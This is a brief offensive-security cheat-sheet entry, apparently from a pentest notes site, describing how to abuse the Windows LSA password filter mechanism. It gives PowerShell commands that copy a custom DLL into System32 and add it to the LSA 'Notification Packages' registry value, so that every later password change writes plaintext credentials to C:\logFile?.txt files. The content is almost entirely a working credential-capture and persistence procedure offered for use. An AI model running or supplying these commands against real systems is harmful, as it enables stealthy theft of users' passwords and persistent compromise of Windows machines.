Password Filter

Abuse PasswordChangeNotify to load a custom DLL capturing plaintext credentials when a password change is performed (the passwords will appear in C:\logFile?.txt files):

PS > $passwordFilterName = (Copy-Item "Win32Project3.dll" -Destination "C:\Windows\System32" -PassThru).basename
PS > $lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
PS > $notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
PS > $notificationPackagesValues += $passwordFilterName
PS > Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
PS > Restart-Computer -Confirm

Last updated